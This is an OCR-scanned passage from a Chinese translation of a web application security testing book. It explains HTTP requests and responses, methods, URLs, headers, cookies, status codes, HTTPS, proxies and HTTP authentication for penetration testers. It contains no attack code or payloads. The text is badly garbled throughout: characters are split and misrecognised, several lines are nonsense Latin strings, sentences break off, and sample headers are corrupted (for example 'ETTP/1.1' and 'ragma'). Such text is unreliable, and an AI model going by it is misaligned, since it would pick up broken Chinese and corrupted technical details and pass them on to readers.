用 有 状态 的 TCP 协 议 作为 它 的 传输 机 制 ， 但 每 次 请 求 与 啊 应 交换 都 目 动 
完成 ， 并 且 可 能 使 用 不 同 的 TCP 连 接 。 


3.1.1 HTTP 请 求 


所 有 HTTP 消 息 〈 请 求 与 响应 ) 中 都 包含 一 个 或 几 个 单行 显示 的 消 
息 头 〈header) ， 然 后 是 一 个 强制 空白 行 ， 最 后 是 消息 主体 〈 可 选 ) 。 
以 下 是 一 个 典型 的 HTTP 请 求 : 


GET /fauth/488/YourDetails.ashx?uid=129 HTTP/1.1 

















Accept: application/x-ms-application, image/jpeg, application/xaml+xnl, 
image/gif, image/pjpeg, application/x-ms-xbap, application/x-shockwave 
flash, */* 

Referer: https://mdsec.net/auth/488/Home.ashx 


Accept-Language: en-GB 


User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; wow64; 
Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 
3.0.30729; .NET4.0C; InfoPath.3; .NET4.0F; FDM; .NET CLR 1.1.4322) 
Accept-Encoding: gzip, deflate 

Host: mdsec.net 

Connection: Keep-Alive 

Cookie: SessionTG=5870C71F3FD49683935CD86682E545476 


每 个 HTTP 请 求 的 第 一 行 都 由 3 个 以 空格 间隔 的 项 目 组 成 。 

口 一 个 说 明 HTTP 方 法 的 动词 。 最 常用 的 方法 为 GET， 它 的 主要 作 
用 是 从 Web 服 务 器 获取 一 个 资源 。GET 请 求 并 没有 消息 主体 ， 因 此 在 消 
奶头 后 的 空白 行 中 没有 其 他 数据 。 

口 所 请 求 的 URL。 该 URL 通 常 由 所 请 求 的 资源 名 称 ， 以 及 一 个 包含 
客户 端 向 该 资源 提交 的 参数 的 可 选 查询 字符 串 组 成 。 在 该 URL 中 ， 查 询 
字符 串 以 ? 字符 标识 ， 上 面 的 示例 中 有 一 个 名 为 uid、 值 为 129 的 参数 。 











O 使 用 的 HTTP 版 本 。 因 特 网 上 常用 的 HTTP 版 本 为 1.0 和 1.1， 多 数 
浏览 器 默认 使 用 1.1 版 本 。 这 两 个 版 本 的 规范 之 间 存 在 一 些 差 异 ; 然 
而 ， 当 攻击 web 应 用 程序 时 ， 渗 透 测 试 员 可 能 遇 到 的 唯一 差异 是 1.1 版 本 
必须 使 用 Host 请 求 头 。 

请 求 示例 中 的 其 他 一 些 要 点 如 下 。 

口 Referer 消 息 头 用 于 表示 发 出 请 求 的 原始 URL Alan, KAH 
击 页 面 上 的 一 个 链接 ) 。 请 注意 ， 在 最 初 的 HITP 规 范 中 ， 这 个 消息 头 
存在 拼写 错误 ， 并 且 这 个 错误 一 直 保留 了 下 来 。 

口 User-Agent 消 息 头 提供 与 浏览 器 或 其 他 生成 请 求 的 客户 端 软件 有 
关 的 信息 。 请 注意 ， 由 于 历史 原因 ， 大 多 数 浏 览 器 中 都 包含 Mozilla 前 
级 。 这 是 因为 最 初 占 支配 地 位 的 Netscape 浏 览 器 使 用 了 User-Agent 字 符 
串 ， 而 其 他 浏览 器 也 希望 让 Web 站 点 相信 它们 与 这 种 标准 兼容 。 与 计算 
领域 历史 上 的 许多 怪异 现象 一 样 ， 这 种 现象 变 得 很 普遍 ， 即 使 当前 版 本 
的 Internet Explorer 也 保留 了 这 一 做 法 ， 示 例 的 请 求 即 由 Internet Explorer 
提出 。 

口 Host 消 息 头 用 于 指定 出 现在 被 访问 的 完整 URL 中 的 主机 名 称 。 如 
果 几 个 Web 站 点 以 相同 的 一 台 服 务 器 为 主机 ， 束 需要 使 用 Host 消 恩 头 ， 
因为 请 求 第 一 行 中 的 URL 内 通常 并 不 包含 主机 名 称 〈 请 参阅 第 17 章 了 解 
更 多 与 虚拟 主机 Web 站 点 有 关 的 信息 ) 。 

DCookie 消 息 头 用 于 提交 服务 器 回 客 户 端 发 布 的 其 他 参数 《请 参阅 
本 章 后 续 内 容 了 解 更 多 详情 ) 。 


3.1.2 HTTP 


以 下 是 一 个 典型 的 HTTP 响 应 : 


ETTP/1.1 200 OK 

Date: Tue, 19 Apr 2011 09:23:32 GMT 

Server: Microsoft-IIS/6.0 

X-Powered-By: ASP.NET 

Set-Cookie: tracking=tI8rk7joMx44S2Uu85nSwe 
X-AspNet-Version: 2.0.50727 




















Cache-Control: no-cache 


ragma: no-cache 


Expires: Thu, 01 Jan 1970 60:00:00 GMT 

Content-Type: text/html; charset=utt-8 

Content-Length: 1067 

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htto:// 
www.w3.org/TR/xhtml1/DTD/xhemii-transitional.dtd"><html xmins="http: // 


www.ws.org/1999/xhtml” ><head><title>Your details</title> 


每 个 HTTP 啊 应 的 第 一 行 由 3 个 以 空格 间隔 的 项 目 组 成 。 

口 使 用 的 HTTP 版 本 。 

口 表 示 请 求 结 果 的 数字 状态 码 。200 是 最 常用 的 状态 码 ， 它 表示 成 
功 提交 了 请 求 ， 正 在 返回 所 请 求 的 资源 。 

口 一 段 文本 形式 的 “原因 短语 ”， 进 一 步 说 明 响 应 状态 。 这 个 短语 中 
可 包含 任何 值 ， 当 前 浏览 器 不 将 其 用 于 任何 目的 。 

啊 应 示例 中 的 其 他 一 些 要 点 如 下 。 

口 Server 消 恩 涉 中 包含 一 个 旗 标 ， 指 明 所 使 用 的 Web 服 务 器 软件 。 
有 时 还 包括 其 他 信息 ， 如 所 安装 的 模块 和 服务 器 操作 系统 。 其 中 包含 的 
信息 可 能 并 不 准确 。 

口 Set-Cookie 消 息 头 同 浏览 器 发 送 男 一 个 cookie， 它 将 在 随后 问 服务 
器 发 送 的 请 求 中 由 Cookie 消 息 头 返回 。 

口 Pragma 消 恩 尖 指示 浏览 器 不 要 将 啊 应 保存 在 缓存 中 。Expires 消 恩 
头 指出 啊 应 内 容 已 经 过 期 ， 因 此 不 应 保存 在 绥 存 中 。 当 返回 动态 内 容 时 
第 常会 发 送 这 些 指令 ， 以 确保 浏览 器 随时 获得 最 新 内 容 。 

口 几乎 所 有 的 HITP 啊 应 在 消息 头 后 的 空白 行 下 面 都 包含 消息 主 
体 ，Content-Type 消 息 头 表示 这 个 消息 主体 中 包含 一 个 HTML 文档 。 

O Content-Length 消 息 头 规定 消息 主体 的 字 节 长 度 。 


3.1.3 HTTP 方 法 


当 渗 透 测试 员 攻 击 Web 应 用 程序 时 ， 几 乎 肯定 会 遇 到 最 常用 的 方 
法 : GET 和 POST。 这 些 方法 之 间 存 在 一 些 必须 了 解 的 重要 差异 ， 忽 上 略 
这 些 差 异 可 能 会 危及 应 用 程序 的 安全 。 

GET 方 法 的 作用 在 于 获取 资源 。 它 可 以 用 于 URL 查 询 字 符 串 的 形式 
问 所 请 求 的 资源 发 送 参 数 。 这 使 用 户 可 将 一 个 包含 动态 资源 的 URL 标 注 
为 书签 ， 用 户 自己 或 其 他 用 户 随后 可 重复 利用 该 书签 来 获取 等 价 的 资源 
(作用 与 标注 为 书签 的 搜索 查询 相似 ) 。URL 显 示 在 屏幕 上 ， 并 被 记录 
在 许多 地 方 ， 如 浏览 器 的 历史 记录 和 和 Web 服务 器 的 访问 日 志 中 。 如 果 单 
击 外 部 链接 ， 还 可 以 用 Referer 消 息 头 将 它们 传送 到 其 他 站 上 点。 因此， 请 
勿 使 用 查询 字符 串 传送 任何 敏感 信息 。 

POST 方 法 的 主要 作用 是 执行 操作 。 使 用 这 个 方法 可 以 在 URL 查 询 
字符 串 与 消息 主体 中 发 送 请 求 参 数 。 尽 管 仍 然 可 以 将 UREL 标 注 为 书签 ， 
但 书签 中 并 不 包含 消息 主体 发 送 的 任何 参数 。 许 多 维护 UREL 日志 的 位 置 
及 Referer 消 息 头 也 将 这 些 参 数 排除 在 外 。 因 为 POST 方法 旨 在 执行 操 
作 ， 如 果 用 户 单 击 浏览 器 上 的 “后 退 ” 按 钮 ， 返 回 一 个 使 用 这 种 方法 访问 
的 页 面 ， 那 么 浏览 器 不 会 自动 重新 发 送 请 求 ， 而 是 就 即将 发 生 的 操作 癌 





























用 户 发 出 警告 ， 如 图 3-1 所 示 。 这 样 做 可 防止 用 户 无 意 中 多 次 执行 同一 
个 操作 。 因 此 ， 在 执行 菏 一 操作 时 必须 使 用 POST 请 求 。 
("Contam 


To display this page, Firefox must send information that will repeat any action (such as a search cr 
order confirmation) that was performed earlier. 


| Resend | Cancel 











BOL 浏览 吕 不 会 自动 重新 发 送 用 户 提出 的 pOST 请 求 ， 因 为 这 样 做 会 导 至 多 次 执 
行 某 一 操作 














除了 GET 和 POST 方 法 以 外 ，HTTP 协 议 还 支持 许多 其 他 因 特 殊 目的 
而 建立 的 方法 。 需 要 了 解 的 其 他 方法 如 下 。 

口 HEAD。 这 个 方法 的 功能 与 GET 方 法 相似 ， 不 同 之 处 在 于 服务 器 
不 会 在 其 响应 中 返回 消息 主体 。 服 务 器 返回 的 消息 头 应 与 对 应 GET 请 求 
返回 的 消息 头 相 同 。 因 此 ， 这 种 方法 可 用 于 检查 某 一 资源 在 向 其 提交 
GET 请 求 前 是 否 存在 。 

口 TRACE。 这 种 方法 主要 用 于 诊断 。 服 务 器 应 在 响应 主体 中 返回 其 
收 到 的 请 求 消息 的 具体 内 容 。 这 种 方法 可 用 于 检测 客户 端 与 服务 器 之 间 
是 否 存在 任何 操纵 请 求 的 代理 服务 器 。 

口 OPTIONS。 这 种 方法 要 求 服 务 器 报告 对 某 一 特殊 资源 有 效 的 
HTTP 方 法 。 服 务 器 通常 返回 一 个 包含 Allow 消 息 头 的 响应 ， 并 在 其 中 列 
出 所 有 有 效 的 方法 。 

口 PUT。 这 个 方法 试图 使 用 包含 在 请 求 主体 中 的 内 容 ， 向 服务 器 上 
传 指定 的 资源 。 如 果 激 活 这 个 方法 ， 渗 透 测 试 员 就 可 以 利用 它 来 攻击 应 
用 程序 。 例 如 ， 通 过 上 传 任意 一 段 脚 本 并 在 服务 器 上 执行 该 脚本 来 攻击 
应 用 程序 。 

还 有 许多 其 他 与 攻击 Web 应 用 程序 没有 直接 关系 的 HTTP 方法 。 然 
而 ， 如 果 激 活 某 些 危险 的 方法 ，Web 服 务 器 可 能 面临 攻击 风险 。 请 参阅 
第 18 章 了 解 更 多 关于 这 些 方法 的 详情 ， 以 及 在 攻击 中 使 用 它们 的 示例 。 


3.1.4 URL 























URL (Uniform Resource Locator， 统 一 资源 定位 符 ) 是 标识 Web 资 
源 的 唯一 标识 符 ， 通 过 它 即 可 获取 其 标识 的 资源 。 最 第 用 的 URL 格 式 如 
下 : 





protocol: //hostname[:port] /{path/] file[?param=value] 


这 个 结构 中 有 几 个 部 分 是 可 选 的 。 如 果 端 口号 与 相关 协议 使 用 的 默 
~ 则 只 包含 端口 号 即 可 。 用 于 生成 前 面 的 HITP 请 求 的 URL 


https://mdsec.net/auth/488/YourDetails.ashx?uid=129 


除 这 种 绝对 形式 外 ， 还 可 以 相对 某 一 特殊 主机 或 主机 上 的 一 个 特殊 
路 径 指 定 UREL， 例 如 : 





/auth/488/YourDetails.ashx?uid=129 
YourDetails.ashx?uid=129 


Web Sil (HI is ss BE FA IX HE A RT AZ TIA Webi KA ERIM AA Be P H E 


航 。 
—7 
$ 注解 ”URL 的 正确 技术 术语 实际 为 URI (Uniform Resource 
Identifier， 统 一 资源 标识 符 ) ， 但 这 一 术语 仅 用 于 正式 规范 中 ， 或 
者 被 那些 希望 炫 兆 学 识 的 人 所 使 用 。 

3.1.5 REST 


表述 性 状态 转移 CREST) 是 分 布 式 系统 的 一 种 体系 架构 ， 在 这 类 
体系 架构 中 ， 请 求 和 啊 应 包含 系统 资源 当前 状态 的 表述 。 万 维 网 ， 包 括 
HTTP 协 议和 URL 格 式 中 使 用 的 核心 技术 ， 均 符合 REST 体 系 架构 风格 。 

虽然 在 查询 字符 串 中 包含 参数 的 URL 本 身 遵 循 REST 约 束 ， 

但 “REST 风 格 的 URL” 一 词 通常 指 在 URL 文 件 路 径 而 非 查 询 字 符 串 中 包 
含 参 数 的 URL。 例 如 ， 下 面 这 个 包含 查询 字符 串 的 URL: 


http: //wahh-app.com/search?make=ford&model=pinto 
与 以 下 包含 “REST 风 格 ” 参 数 的 URL 相 对 应 : 
http://wahh-app.com/search/ford/pinto 


在 第 4 章 中 ， 我 们 将 讨论 如 何在 解析 应 用 程序 的 内 容 和 功能 、 以 及 
确定 其 受 攻击 面 时 处 理 这 些 不 同 风格 的 参数 。 














HITP 文 持 许多 不 同 的 消 轧 头 ， 其 中 一 些 专用 于 特殊 用 途 。 一 些 消 
恩 头 可 用 在 请 求 与 啊 应 中 ， 而 其 他 一 些 消息 头 只 能 专门 用 在 某 个 特定 的 
消息 中 。 下 面 列 出 渗透 测试 员 在 攻击 Web 应 用 程序 时 可 能 遇 到 的 消 旦 
he 


1. 第 用 消息 头 
口 Connection。 这 个 消息 头 用 于 告诉 通信 的 另 一 端 ， 在 完成 HITP 传 
输 后 是 关闭 TCP 连 接 ， 还 是 保持 连接 开放 以 接收 其 他 消息 。 
DContent-Encoding。 这 个 消息 头 为 消息 主体 中 的 内 容 指 定编 码 形 
式 〈 如 gzip) ， 一 些 应 用 程序 使 用 它 来 压缩 啊 应 以 加 快 传输 速度 。 
O Content-Length。 这 个 消息 头 用 于 规定 消息 主体 的 字 节 长 度 。 
l 它 在 对 应 的 GET 请 求 的 啊 应 中 指出 主体 的 长 
a) 

DContent-Type。 这 个 消息 头 用 于 规定 消息 主体 的 内 容 类 型 。 例 
如 ，HTML 文 档 的 内 容 类 型 为 text/html。 

口 Transfer-Encoding。 这 个 消息 头 指定 为 方便 其 通过 HTTP 传 输 而 对 
消息 主体 使 用 的 任何 编码 。 如 果 使 用 这 个 消息 头 ， 通 常用 它 指定 块 编 


码 。 

2. 请 求 消息 头 
口 Accept。 这 个 消息 头 用 于 告诉 服务 器 客户 端 愿 意 接 受 哪些 内 容 ， 
如 图 像 类 型 、 办 公文 档 格 式 等 。 
口 Accept-Encoding。 这 个 消息 头 用 于 告诉 服务 器 ， 客 户 端 愿 意 接受 
哪些 内 容 编码 。 
g Authorization. SASK FAH A BHT TP) fp or iE Jd IRS 
Aspe UEP o 
O Cookie. 1% EAH FIRS ae hee E MAI AA cookie. 
口 Host。 这 个 消息 头 用 于 指定 出 现在 所 请 求 的 完整 UREL 中 的 主机 名 


口 If-Modified-Since。 这 个 消息 头 用 于 说 明 浏 览 右 最 后 一 次 收 到 所 请 
求 的 资源 的 时 间 。 

如 果 自 那 以 后 资源 没有 发 生变 化 ， 服 务 器 就 会 发 出 一 个 带 状 态 码 
304 的 响应 ， 指 示 客 户 端 使 用 资源 的 缓存 副本 。 

口 I-None-Match。 这 个 消息 头 用 于 指定 一 个 实体 标签 。 实 体 标签 是 
一 个 说 明 消 息 主体 内 容 的 标识 符 。 当 最 后 一 次 收 到 所 请 求 的 资源 时 ， 浏 
览 器 提交 服务 器 发 布 的 实体 标签 。 服 务 器 可 以 使 用 实体 标签 确定 浏览 器 
是 否 使 用 资源 的 缓存 副本 。 

DOrigin。 这 个 消息 头 用 在 跨 域 Ajax 请 求 中 ， 用 于 指示 提出 请 求 的 
域 (请 参阅 第 13 章 了 解 相关 内 容 〉。 
































口 Referer。 这 个 消息 头 用 于 指示 提出 当前 请 求 的 原始 URL。 
口 User-Agent。 这 个 消 轧 头 提 供与 浏览 器 或 生成 请 求 的 其 他 客户 端 





软件 有 关 的 信息 。 





3. MH) IE ASK 
口 Access-Control-Allow-Origin。 这 个 消息 头 用 于 指示 可 人 否 通 过 跨 域 





Ajax 请 求 获取 资源 。 


口 Cache-Control。 这 个 消息 头 用 于 辐 浏 览 器 传送 缓存 指令 CM- 


cache) 。 


求 中 





口 ETag。 这 个 消 恩 头 用 于 指定 一 个 实体 标签 。 客 户 端 可 在 将 来 的 请 
提交 这 个 标识 符 ， 获 得 和 If-None-Match 消 息 头 中 相同 的 资源 ， 通 知 





服务 器 浏览 器 当前 缓存 中 保存 的 是 哪个 版 本 的 资源 。 


Ele 
响应 


口 Expires。 这 个 消 妃 头 用 于 回 浏 览 器 说 明 消息 主体 内 容 的 有 效 时 
在 这 个 时 间 之 前 ， 浏 览 器 可 以 使 用 这 个 资源 的 缓存 副本 。 

口 Location。 这 个 消息 头 用 于 在 重 定 同 啊 应 《那些 状态 码 以 3 开头 的 
) 中 说 明 重 定 同 的 目标 。 

口 Pragma。 这 个 消息 涉 用 于 同 浏览 器 传送 绥 存 指令 (如 no- 











cache) 。 


DServer。 这 个 消息 头 提供 所 使 用 的 web 服务 器 软件 的 相关 信息 。 
口 Set-Cookie。 这 个 消息 头 用 于 向 浏览 器 发 布 cookie， 浏 览 器 会 在 随 





后 的 
供与 


前 啊 


请 求 中 将 其 返回 给 服务 器 。 

口 WWW-Authenticate。 这 个 消息 头 用 在 带 401 状 态 码 的 啊 应 中 ， 提 
服务 器 所 文 持 的 身份 验证 类 型 有 关 的 信息 。 

口 X-Frame-Options。 这 个 消息 头 指示 浏览 器 框架 是 否 及 如 何 加 载 当 
应 (请 参阅 第 13 章 了 解 相 关内 容 〉。 








3.1.7 cookie 


分 ， 


cookie 是 大 多 数 Web 应 用 程序 所 依赖 的 HTTP 协 议 的 一 个 关键 组 成 部 
攻击 者 常常 通过 它 来 利用 Web 应 用 程序 中 的 漏洞 。 服 务 器 使 用 





cookie 机 制 回 客户 端 发 送 数据 ， 客 户 端 保存 cookie 并 将 其 返回 给 服务 


器 。 
同 ， 
续 重 





与 其 他 类 型 的 请 求 参数 (存在 于 URL 查 询 字 符 串 或 消息 主体 中 ) 不 
无 须 应 用 程序 或 用 户 采 取 任 何 特殊 措施 ， 随 后 的 每 一 个 请 求 都 会 继 
新 问 服 务 器 提交 cookie。 

如 前 所 述 ， 服 务 器 使 用 Set-Cookie 响 应 消息 头发 布 cookie: 


Set-Cookie: tracking=tI8rk7joMx44S2Uu85nSWe 


然后 ， 用 户 的 浏览 器 目 动 将 下 面 的 消息 头 添加 到 随后 返回 给 同一 服 








务 器 的 请 求 中 : 
Cookie: tracking=tI8rk7joMx44S2Uu85nSWe 


如 上 所 示 ，cookie 一 般 由 一 个 名 / 值 对 构成 ， 但 也 可 包含 任何 不 含 空 
格 的 字符 串 。 可 以 在 服务 器 啊 应 中 使 用 几 个 Set-Cookie 消 息 头 发 布 多 个 
cookie， 并 可 在 同一 个 Cookie 消 息 头 中 用 分 号 分 隔 不 同 的 cookie， 将 它 
们 全 部 返回 给 服务 器 。 

除 cookie 的 实际 值 外 ，Set-Cookie 消 息 头 还 可 包含 以 下 任何 可 选 属 
性 ， 用 它们 控制 浏览 器 处 理 cookie 的 方式 。 

口 expires。 用 于 设 定 cookie 的 有 效 时 间 。 这 样 会 使 浏览 器 将 cookie 保 
存在 永久 性 的 存储 器 中 ， 在 随后 的 浏览 器 会 话 中 重复 利用 ， 直 到 到 期 时 
间 为 止 。 如 果 没 有 设 定 这 个 属性 ， 那 么 cookie 仅 用 在 当前 浏览 器 会 话 


中 
口 domain。 用 于 指定 cookie 的 有 效 域 。 这 个 域 必 须 和 收 到 cookie 的 
域 相同 ， 或 者 是 它 的 父 域 。 
口 path。 用 于 指定 cookie 的 有 效 URL 路 径 。 
D secure。 如 果 设 置 这 个 属性 ， 则 仅 在 HTTPS 请 求 中 提交 cookie。 
D HttpOnly。 如 果 设 置 这 个 属性 ， 将 无 法 通过 客户 端 JavaScript 直 接 
访问 cookie。 
上 述 每 一 个 cookie 属 性 都 可 能 影响 应 用 程序 的 安全 ， 其 造成 的 主要 
不 利 影响 在 于 攻击 者 能 够 直接 对 应 用 程序 的 其 他 用 户 发 动 攻 击 。 请 参阅 
第 12 章 和 第 13 章 了 解 更 多 详情 。 


3.1.8 JANIE 
每 条 HTTP 响 应 消息 都 必须 在 第 一 行 中 包含 一 个 状态 码 ， 说 明 请 求 
的 结果 。 根 据 代码 的 第 一 位 数字 ， 可 将 状态 码 分 为 以 下 5 类 。 


m) 1xx 一 一 提供 信 A o 


























口 2xx 一 一 请 求 被 成 功 提交 。 

口 3xx 一 一 客户 端 被 重 定 问 到 其 他 资源 。 
口 4xx 一 一 请 求 包含 某 种 错误 。 

口 5xx 一 一 服务 器 执行 请 求 时 过 到 错误 。 


还 有 大 量 特殊 状态 码 ， 其 中 许多 状态 码 仅 用 在 特殊 情况 下 。 下 面 列 
o a a 
原因 短语 。 

口 100 Continue。 当 客户 端 提交 一 个 包含 主体 的 请 求 时 ， 将 发 送 这 
个 啊 应 。 该 啊 应 表示 已 收 到 请 求 消 息 头 ， 客 户 端 应 继续 发 送 主体 。 请 求 





完成 后 ， 再 由 服务 器 返回 另 一 个 啊 应 。 
口 200 Ok。 本 状态 码 表示 已 成 功 提 交 请 求 ， 且 啊 应 主体 中 包含 请 求 


口 201 Created。PUT 请 求 的 啊 应 返回 这 个 状态 码 ， 表 示 请 求 已 成 功 











口 301 Moved Permanently。 本 状态 码 将 浏览 器 永久 重 定 同 到 另外 一 
个 在 Location 消 息 头 中 指定 的 UREL。 以 后 客户 端 应 使 用 新 UREL 蔡 换 原 始 
URL. 

0302 Found。 本 状态 码 将 浏览 器 暂时 重 定 同 到 男 外 一 个 在 Location 
消息 头 中 指定 的 URL。 客 户 端 应 在 随后 的 请 求 中 恢复 使 用 原始 URL。 

口 304 Not Modified。 本 状态 人 码 指示 浏览 器 使 用 绥 存 中 保存 的 所 请 求 
资源 的 副本 。 服 务 器 使 用 If-Modified-Since 与 I-None-Match 消 息 头 确定 
客户 端 是 否 拥有 最 新 版 本 的 资源 。 

口 400 Bad Request。 本 状态 人 码 表 示 客 户 问 提交 了 一 个 无 效 的 HTTP 
请 求 。 当 以 某 种 无 效 的 方式 修改 请 求 时 《例如 在 UREL 中 插入 一 个 空格 
符 ) ， 可 能 会 遇 到 这 个 状态 人 码 。 

口 401 Unauthorized。 服 务 器 在 许可 请 求 前 要 求 HITP 进 行 身份 验 
证 。WWW-Authenticate 消 息 头 详细 说 明 所 文 持 的 身份 验证 类 型 。 

口 403 Forbidden。 本 状态 码 指出 ， 不 管 是 否 通 过 喘 份 验证 ， 人 禁止 任 
何人 访问 被 请 求 的 资源 。 

口 404 Not Found。 本 状态 码 表 示 所 请 求 的 资源 并 不 存在 。 

口 405 Method Not Allowed。 本 状态 码 表示 指定 的 URL 不 支持 请 求 中 
使 用 的 方法 。 例 如 ， 如 果 试 图 在 不 支持 PUT 方 法 的 地 方 使 用 该 方法 ， 束 
会 收 到 本 状态 码 。 

口 413 Request Entity Too Large。 如 果 在 本 地 代码 中 探查 绥 冲 喜 溢 出 
C 则 本 状态 码 表 示 请 求 主体 过 长 ， 服 务 器 无 
法 处 理 。 

口 414 Request URI Too Long。 与 前 一 个 啊 应 类 似 ， 本 状态 码 表示 请 
求 中 的 URL 过 长 ， 服 务 器 无 法 处 理 。 

口 500 Internal Server Error。 本 状态 码 表示 服务 器 在 执行 请 求 时 过 到 
错误 。 当 提交 无 法 预料 的 输入 、 在 应 用 程序 处 理 过 程 中 造成 无 法 处 理 的 
错误 上 时， 通常 会 收 到 本 状态 码 。 应 该 仔细 检查 服务 器 啊 应 的 所 有 内 容 ， 
了 解 与 错误 性 质 有 关 的 详情 。 

口 503 Service Unavailable。 通 常 ， 本 状态 码 表示 尽管 Web 服 务 右 运 
转正 常 ， 并 且 能 够 啊 应 请 求 ， 但 服务 器 访问 的 应 用 程序 还 是 无 法 作出 啊 
应 。 应 该 进行 核实 ， 是 否 因为 执行 了 某 种 行为 而 造成 这 个 结果 。 















































3.1.9 HTTPS 


HTTP 使 用 普通 的 非 加 密 TCP 作 为 其 传输 机 制 ， 因 此 ， 处 在 网 络 适 
当 位 置 的 攻击 者 能 够 截取 这 个 机 制 。HTTPS 本 质 上 与 HTTP 一 样 ， 都 属 
于 应 用 层 协 议 ， 但 HTTPS 通 过 安全 传输 机 制 一 一 安全 套 接 层 (Secure 
Socket Layer, SSL) 一 一 传送 数据 。 这 种 机 制 可 保护 通过 网 络 传送 的 所 
有 数据 的 隐秘 性 与 完整 性 ， 显 车 降低 非 入 侵 性 拦截 攻击 的 可 能 性 。 不 管 
是 否 使 用 SSL 进 行 传 输 ，HTTP 请 求 与 啊 应 都 以 完全 相同 的 方式 工作 。 








Ey 


` 注解 ”如 今 的 SSL 实 际 上 已 经 由 TLS (Transport Layer 
Security， 传 输 层 安全 ) 代替 ， 但 后 者 通常 还 是 使 用 SSL 这 个 名 称 。 








3.1.10 HTTP 代理 


HTTP 代 理 服务 器 是 一 个 协调 客户 端 浏览 器 与 目标 Web 服 务 器 之 间 
访问 的 服务 器 。 当 配置 浏览 右 使 用 代理 服务 器 时 ， 它 会 将 所 有 请 求 提 交 
到 代理 服务 器 ， 代 理 服务 器 再 将 请 求 转送 给 相关 Web 服 务 硕 ， 并 将 啊 应 
返回 给 浏览 器 。 大 多 数 代 理 还 使 用 其 他 服务 ， 如 缓存 、 验 证 与 访问 控 





fill 。 
值得 注意 的 是 ， 如 果 使 用 代理 服务 器 ，HTTP 的 工作 机 制 会 出 现 两 
方面 的 差异 。 


口 当 浏 览 器 向 代理 服务 器 发 布 HTTP 请 求 时 ， 它 会 将 完整 的 
URL (包括 协议 前 级 http:// 与 服务 器 主机 名 称 ， 在 非 标准 URL 中 ， 还 包 
括 端口 号 ) 插入 请 求 中 。 代 理 服 务 器 将 提取 主机 名 称 和 端口 ， 并 使 用 这 
些 信 息 将 请 求 指向 正确 的 目标 Web 服 务 器 。 

口 当 使 用 HTTPS 时 ， 浏 览 器 无 法 与 代理 服务 器 进行 SSL 握 手 ， 因 为 
这 样 做 会 破坏 安全 隧道 ， 使 通信 吻 于 遭受 拦截 攻击 。 因 此 ， 浏 览 器 必须 
将 代理 作为 一 个 纯粹 的 TCP 级 中 继 ， 由 它 传 递 浏览 器 与 目标 Web 浏 览 器 
之 间 的 所 有 网 络 数据 ， 并 与 浏览 器 进行 正常 的 SSL 握 手 。 浏 览 器 使 用 
CONNECT 方 法 同 代 理 服务 右 提 交 一 个 HTTP 请 求 ， 并 指定 URL 中 的 目 
标 主 机 名 称 与 端口 写 ， 从 而 建立 这 种 中 继 。 如 果 代 理 人 允许 该 请 求 ， 它 会 
返回 一 个 含 200 状 态 码 的 HITP 啊 应 ， 一 直 开 放 TCP 连 接 ， 从 此 以 后 作为 
目标 Web 服 务 器 的 纯粹 TCP 级 中 继 。 








从 某 种 程度 上 说 ， 攻 击 Web 应 用 程序 时 最 有 用 的 工具 是 一 个 处 在 浏 
览 器 与 目标 Web 站 点 之 间 的 专用 代理 服务 器 ， 使 用 它 可 以 拦截 并 修改 所 
人 
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3.1.11 _ HTTP 吴 份 验证 


HTTP 拥 有 自己 的 用 户 身份 验证 机 制 ， 使 用 不 同 的 身份 验证 方案 。 
口 Basic。 这 是 一 种 非常 简单 的 身份 验证 机 制 ， 它 在 请 求 消息 头 中 随 
每 条 消息 以 Base64 编 码 字 符 串 的 形式 发 送 用 户 证 书 。 
口 NTLM。 这 是 一 种 质询 - 啊 应 式 机 制 ， 它 使 用 某 个 Windows NTLM 
协议 版 本 。 
口 Digest。 这 是 一 种 质询 -响应 式 机 制 ， 它 随同 用 户 证 书 一 起 使 用 一 
个 随机 值 MD5 校 验 和 。 

虽然 组 织 内 部 经 常 使 用 这 些 身 份 验证 协议 访问 内 联网 服务 ， 但 因 特 
网 上 的 Web 应 用 程序 基本 很 少 使 用 它们 。 





BE gags a 

基本 身份 验证 将 未 加 密 的 证 书 插入 HTTP 请 求 中 ， 因 此 ， 人 们 
普遍 认为 这 种 协议 并 不 安全 ， 不 应 该 使 用 它们 。 但 实际 上 ， 许 多 银 
(F BEADAB FAEN SHOSE BAERE KE BAA HTTP 


AY LEH HTTPS EALE, Bae AEATHTT PY Se 2 YT 
攻击 ;每 一 个 具有 安全 意识 的 应 用 程序 都 应 采用 这 种 机 制 。 至 少 从 
鳃 听 方 面 来 说 ， 基 本 身份 验证 机 制 并 不 比 今天 绝 大 多 数 Web 应 用 程 
序 使 用 的 身份 验证 机 制 更 加 糟糕 。 





3.2 Web 功能 


除了 在 客户 问 与 服务 器 之 间 发 送 消 恩 时 使 用 的 核心 通信 协议 外 ， 
Web 应 用 程序 还 使 用 许多 不 同 的 技术 来 实现 其 功能 。 任 何 共 有 一 定 功 能 
的 应 用 程序 都 会 在 其 服务 器 与 客户 端 组 件 中 采用 知 干 种 技术 。 在 癌 Web 
应 用 程序 发 动 猛烈 攻击 前 ， 渗 透 测试 员 必 须 对 应 用 程序 如 何 实现 其 功 
能 、 所 使 用 技术 的 运作 方式 及 其 可 能 存在 的 弱点 有 一 个 基本 的 了 解 。 


3.2.1 务 器 端 功能 


早期 的 万 维 网 仅 包 含 静 态 内 容 。Web 站 点 由 各 种 静态 资源 组 成 ， 如 
HTML 页 面 与 图 片 ， 当 用 户 提 交 请 求 时 ， 只 需 将 它们 加 载 到 Web 服 务 
器 ， 再 传送 给 用 户 即 可 。 每 次 用 户 请 求 菜 个 特殊 的 资源 时 ， 服 务 器 都 会 
返回 相同 的 内 容 。 

如 今 的 Web 应 用 程序 仍然 使 用 相当 数量 的 静态 资源 。 但 它们 主要 问 
用 户 提 供 动 态 生 成 的 内 容 。 当 用 户 请 求 一 个 动态 资源 时 ， 服 务 器 会 动态 
建立 啊 应 ， 每 个 用 户 都 会 收 到 满足 其 特定 需求 的 内 容 。 

动态 内 容 由 在 服务 器 上 执行 的 脚本 或 其 他 代码 生成 。 在 形式 上 ， 这 
些 脚 本 类 似 于 计算 机 程序 : 它们 收 到 各 种 输入 ， 并 处 理 输 入 ， 然 后 疝 用 
性 返 回 输出 结果 。 

当 用 户 的 浏览 器 提出 访问 动态 资源 的 请 求 时 ， 它 并 不 仅仅 是 要 求 访 
